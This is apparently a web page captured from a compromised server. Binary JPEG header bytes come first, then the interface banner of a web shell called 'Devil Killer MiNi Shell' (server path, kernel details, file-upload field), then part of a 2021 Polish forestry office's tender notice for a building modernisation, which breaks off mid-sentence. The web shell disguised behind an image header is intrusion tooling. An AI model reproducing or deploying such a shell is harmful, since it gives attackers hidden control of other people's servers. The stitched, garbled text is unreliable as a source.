JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210525/0006300501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00063005 z dnia 2021-05-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Modernizacja budynku w celu adaptacji na samodzielną kancelarię leśnictwa Dziewanna” – II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Potrzebowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570064470</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Potrzebowice</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieleń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-730</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">672562526</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">672562492</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">potrzebowice@pila.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.potrzebowice.pila.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> usługi w zakresie lesnictwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Modernizacja budynku w celu adaptacji na samodzielną kancelarię leśnictwa Dziewanna” – II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3574e8a0-bd1c-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00063005</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00043200/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Adaptacja budynku na kancelarię leśnictwa Dziewanna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.pila.lasy.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną za<br/>pośrednictwem Platformy eZamawiający - https://zamowienia.pila.lasy.gov.pl/ lub poczty elektronicznej<br/>– potrzebowice@pila.lasy.gov.plOświadczenia, wnioski, zawiadomienia, odwołania oraz informacje<br/>strony przekazują za pośrednictwem Platformy eZamawiający pod adresem:<br/>https://zamowienia.pila.lasy.gov.pl/ lub przy pomocy poczty elektronicznej. Wszelkie oświadczenia,<br/>wnioski, zawiadomienia, odwołania oraz inf., przekazywane za pomocą poczty elektronicznej muszą<br/>zawierać w tytule wiadomości numer referencyjny sprawy, której ona dotyczy (S.270.2.1.2021). Ogólne<br/>zasady korzystania z Platformy:zgłoszenie do postępowania wymaga zalogowania Wykonawcy do<br/>Systemu na subdomenie RDLP w Pile pod adresem Platforma eZamawiający -<br/>https://zamowienia.pila.lasy.gov.pl/ lub Platforma Zakupowa Marketplanet<br/>https://oneplace.marketplanet.pl.Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie<br/>przekierowany do strony Platforma Zakupowa Marketplanet https://oneplace.marketplanet.pl/, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca<br/>zakłada konto wykonując kroki procesu rejestracyjnego: podaje adres e-mail, ustanawia hasło,<br/>następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”;<br/>Ofertę wraz z wymaganymi załącznikami składa się w postaci elektronicznej, opatrzonych<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby<br/>umocowane, pod rygorem nieważności na Platformie eZamawiający pod adresem internetowym:<br/>https://zamowienia.pila.lasy.gov.pl/ w zakładce „Oferty”.korzystanie z Platformy eZamawiający jest<br/>bezpłatne.Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na<br/>Platformie eZamawiający, tj.:stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s;komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram,<br/>procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub<br/>ich nowsze wersje;zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w<br/>najnowszej wersji, w przypadku Internet Explorer minimalnie wersja 10.0;włączona obsługa<br/>JavaScript;zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.Zamawiający określa dopuszczalne formaty przesyłanych danych, tj.: plików o wielkości do 100<br/>MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, docx, xlsx, csv, jpg, jpeg, tif, png, svg, zip, tar, gz, gzip,<br/>7z, XAdES, CAdES, PAdES.Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa RMz dnia 30.12.20 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniem MRPiT, z dnia 30.12.20 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać zamawiający od Wykonawców . Wymagania<br/>techniczne oraz organizacyjne, dotyczące komunikacji Zamawiającego z Wykonawcami, zasady<br/>funkcjonowania Platformy eZamawiający, a także sposób składania ofert oraz zamieszczania przez<br/>Wykonawców wszelkich oświadczeń, wniosków, zawiadomień, odwołań oraz informacji określa<br/>również Instrukcja dla Wykonawców, dostępna na Platformie eZamawiający w zakładce „Regulacje i<br/>procedury procesu zakupowego”.Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości<br/>związanych z zasadami korzystania z Platformy eZamawiający, Wykonawca winien skontaktować się z<br/>dostawcą rozwiązania teleinformatycznego Platforma eZamawiający - RDLPw Pile, tel. +48 25 72 223<br/>(infolinia dostępna w dni robocze, w godzinach 9.00-17.00), e-mail: oneplace@marketplanet.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE<br/>L119 z 04 maja 2016 r., str. 1 – dalej „RODO”) Zamawiający informuje, iż administratorem danych<br/>osobowych jest Nadleśnictwo Potrzebowice.2. Zamawiający przetwarza dane osobowe zebrane w<br/>niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie<br/>przed ich bezprawnym rozpowszechnianiem. 3. Zamawiający udostępnia dane osobowe, o których<br/>mowa w art.10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w<br/>dziale VI PZP, do upływu terminu do ich wniesienia. 4. Do przetwarzania danych osobowych, o których<br/>mowa wart. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby<br/>dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności. 5. Dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak<br/>również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu zawarcia umowy w<br/>sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o<br/>udzielenie zamówienia i jego archiwizacji.6. Odbiorcami danych osobowych będą osoby lub<br/>podmioty,którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP.7.<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 97 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy<br/>przekracza 4 lata,okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia<br/>publicznego.8.Niezależnie od postanowień pkt 7. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy w sprawie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dane osobowe pozyskane w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym<br/>usługi doradcze, w tym usługi prawne i konsultingowe. 10. Stosownie do art. 22 RODO, decyzje<br/>dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.11. Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma<br/>prawo:1)dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie<br/>dużego wysiłku Zamawiający może żądać wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego<br/>postępowania o udzielenie zamówienia publicznego;2) do sprostowana swoich danych osobowych –<br/>zgodnie z art. 16RODO, przy czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego załączników;3) do<br/>żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego;4)wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych w przypadku uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie<br/>danych osobowych, w tym przepisy RODO.12. Obowiązek podania danych osobowych jest wymogiem<br/>ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego;konsekwencje niepodania określonych danych określa PZP.13. Osobie, której<br/>dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem niniejszego<br/>postępowania o udzielenie zamówienia publicznego nie przysługuje:1) prawo do usunięcia danych<br/>osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO, 2) prawo do przenoszenia danych<br/>osobowych, o którym mowa w art.20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec<br/>przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.14. Dane osobowe mogą być przekazywane do organów<br/>publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów<br/>prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania<br/>władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec<br/>Zamawiającego. Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu<br/>administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.2.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: „Modernizacja budynku w celu adaptacji na samodzielną<br/>kancelarię leśnictwa Dziewanna”.2. Szczegółowy opis przedmiotu zamówienia zamieszczono w<br/>Załącznikach nr 1.1-1.3 do SWZ, na które składają się (wybór):- dokumentacja projektowa zał. nr<br/>7 - Specyfikacja Techniczna Wykonania i Odbioru Robót zał. nr 6 - przedmiar robót zał. nr<br/>5Zamawiający stosownie do art. 95 ust. 1 ustawy, określa obowiązek zatrudnienia na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, których<br/>wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26<br/>czerwca 1974 r. – Kodeks pracy. Osobami objętymi tym obowiązkiem są wszyscy pracownicy<br/>fizyczni wykonujący prace ogólnobudowlane. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a. W zakresie doświadczenia:Wykonawca spełni ten warunek jeżeli wykaże, że wykonał<br/>należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie minimum jedną robotę budowlaną<br/>polegającą na Remoncie, budowie, przebudowie budynku biurowego, obejmującą prace<br/>ogólnobudowlane.. na kwotę min. 250 000,00 zł.Warunek ten, w zakresie osób skierowanych<br/>przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że dysponuje lub będzie dysponować: - co najmniej 1 osobą kierownikiem budowy - z<br/>uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno<br/>– budowlanej,- co najmniej 1 osobą kierownikiem budowy - z uprawnieniami budowlanymi do<br/>kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń elektrycznych i elektroenergetycznych; z aktualnymi uprawnieniami zawodowymi<br/>wydanymi na podstawie ustawy Prawo Budowlane lub inne odpowiednie wydane na podstawie<br/>wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia budowlane, które<br/>zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994r.<br/>Prawo Budowlane ( t. jedn. Dz. U. z 2020, poz. 148 z późn. zm.) oraz ustawy z dnia 22 grudnia<br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej (Dz. U. z 2020 r., poz. 220 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawca wraz z ofertą zobowiązany jest złożyć:1) Oświadczenie o<br/>spełnieniu warunków udziału w postępowaniu – na lub zgodnie z zał. Nr 3 do SWZ.2. W przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 1) każdy Wykonawca, w celu<br/>potwierdzenia, że nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, zobowiązany<br/>jest złożyć oddzielnie oświadczenia, o których mowa w ust.1;2) należy złożyć oświadczenie dotyczące<br/>realizacji zakresu przedmiotu zamówienia przez poszczególnych Wykonawców – na lub zgodnie z zał.<br/>Nr 3a do SWZ.Wykaz podmiotowych środków dowodowych składanych na wezwanie<br/>Zamawiającego1)wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; 2) Wykaz osób skierowanych<br/>przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie robót budowlanych, wraz z informacjami na temat ich doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca wraz z ofertą zobowiązany jest złożyć:1) Oświadczenie o niepodleganiu wykluczeniu –<br/>na lub zgodnie z zał. Nr 2 do SWZ. 2. W przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia: 1) każdy Wykonawca, w celu potwierdzenia, że nie podlega wykluczeniu oraz<br/>spełnia warunki udziału w postępowaniu, zobowiązany jest złożyć oddzielnie oświadczenia, o których<br/>mowa w ust.1;2) należy złożyć oświadczenie dotyczące realizacji zakresu przedmiotu zamówienia<br/>przez poszczególnych Wykonawców – na lub 